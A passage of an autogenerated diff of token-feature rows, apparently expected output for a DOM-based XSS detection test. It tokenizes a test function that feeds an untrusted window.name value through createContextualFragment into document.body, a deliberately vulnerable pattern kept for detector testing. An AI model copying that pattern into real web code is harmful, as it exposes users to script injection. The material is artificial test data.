autogenerated/Xss/DomBasedXss/tst.js:286:17:286:36 | document.createRange | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:286:17:286:36 | document.createRange | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:286:17:286:38 | documen ... Range() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:286:17:286:38 | documen ... Range() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:286:17:286:38 | documen ... Range() | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:286:17:286:38 | documen ... Range() | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:286:17:286:38 | documen ... Range() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:286:17:286:38 | exceptional return of documen ... Range() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:286:17:286:38 | exceptional return of documen ... Range() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:286:17:286:38 | exceptional return of documen ... Range() | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:286:17:286:38 | exceptional return of documen ... Range() | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:286:17:286:38 | exceptional return of documen ... Range() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:286:26:286:36 | createRange | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:286:26:286:36 | createRange | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:286:26:286:36 | createRange | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:286:26:286:36 | createRange | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:286:26:286:36 | createRange | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:287:5:287:9 | range | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:287:5:287:9 | range | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:287:5:287:9 | range | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:287:5:287:9 | range | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:287:5:287:9 | range | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:287:5:287:20 | range.selectNode | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:287:5:287:20 | range.selectNode | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:287:5:287:20 | range.selectNode | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:287:5:287:20 | range.selectNode | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:287:5:287:20 | range.selectNode | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:287:5:287:66 | exceptional return of range.s ... tem(0)) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:287:5:287:66 | exceptional return of range.s ... tem(0)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:287:5:287:66 | exceptional return of range.s ... tem(0)) | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:287:5:287:66 | exceptional return of range.s ... tem(0)) | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:287:5:287:66 | exceptional return of range.s ... tem(0)) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:287:5:287:66 | range.s ... tem(0)) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:287:5:287:66 | range.s ... tem(0)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:287:5:287:66 | range.s ... tem(0)) | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:287:5:287:66 | range.s ... tem(0)) | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:287:5:287:66 | range.s ... tem(0)) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:287:11:287:20 | selectNode | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:287:11:287:20 | selectNode | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:287:11:287:20 | selectNode | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:287:11:287:20 | selectNode | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:287:11:287:20 | selectNode | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:29 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:29 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:29 | document | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:29 | document | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:29 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:50 | documen ... TagName | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:50 | documen ... TagName | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:50 | documen ... TagName | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:50 | documen ... TagName | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:50 | documen ... TagName | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:57 | documen ... ("div") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:57 | documen ... ("div") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:57 | documen ... ("div") | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:57 | documen ... ("div") | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:57 | documen ... ("div") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:57 | exceptional return of documen ... ("div") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:57 | exceptional return of documen ... ("div") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:57 | exceptional return of documen ... ("div") | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:57 | exceptional return of documen ... ("div") | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:57 | exceptional return of documen ... ("div") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:62 | documen ... ").item | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:62 | documen ... ").item | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:62 | documen ... ").item | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:62 | documen ... ").item | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:62 | documen ... ").item | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:287:22:287:65 | documen ... item(0) | CalleeFlexibleAccessPath | range.selectNode | | autogenerated/Xss/DomBasedXss/tst.js:287:22:287:65 | documen ... item(0) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:287:22:287:65 | documen ... item(0) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17154,6 +119101,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:287:22:287:65 | documen ... item(0) | enclosingFunctionName | testCreateContextualFragment | | autogenerated/Xss/DomBasedXss/tst.js:287:22:287:65 | documen ... item(0) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:287:22:287:65 | documen ... item(0) | receiverName | range | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:65 | exceptional return of documen ... item(0) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:65 | exceptional return of documen ... item(0) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:65 | exceptional return of documen ... item(0) | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:65 | exceptional return of documen ... item(0) | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:287:22:287:65 | exceptional return of documen ... item(0) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:287:31:287:50 | getElementsByTagName | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:287:31:287:50 | getElementsByTagName | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:287:31:287:50 | getElementsByTagName | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:287:31:287:50 | getElementsByTagName | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:287:31:287:50 | getElementsByTagName | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:287:52:287:56 | "div" | CalleeFlexibleAccessPath | document.getElementsByTagName | | autogenerated/Xss/DomBasedXss/tst.js:287:52:287:56 | "div" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:287:52:287:56 | "div" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17162,6 +119119,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:287:52:287:56 | "div" | enclosingFunctionName | testCreateContextualFragment | | autogenerated/Xss/DomBasedXss/tst.js:287:52:287:56 | "div" | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:287:52:287:56 | "div" | receiverName | document | +| autogenerated/Xss/DomBasedXss/tst.js:287:59:287:62 | item | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:287:59:287:62 | item | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:287:59:287:62 | item | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:287:59:287:62 | item | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:287:59:287:62 | item | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:287:64:287:64 | 0 | CalleeFlexibleAccessPath | document.getElementsByTagName().item | | autogenerated/Xss/DomBasedXss/tst.js:287:64:287:64 | 0 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:287:64:287:64 | 0 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17169,6 +119131,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:287:64:287:64 | 0 | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | | autogenerated/Xss/DomBasedXss/tst.js:287:64:287:64 | 0 | enclosingFunctionName | testCreateContextualFragment | | autogenerated/Xss/DomBasedXss/tst.js:287:64:287:64 | 0 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:288:9:288:24 | documentFragment | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:288:9:288:24 | documentFragment | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:288:9:288:24 | documentFragment | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:288:9:288:24 | documentFragment | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:288:9:288:24 | documentFragment | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:288:9:288:66 | documen ... ainted) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:288:9:288:66 | documen ... ainted) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:288:9:288:66 | documen ... ainted) | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:288:9:288:66 | documen ... ainted) | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:288:9:288:66 | documen ... ainted) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:288:9:288:66 | documentFragment | contextFunctionInterfaces | 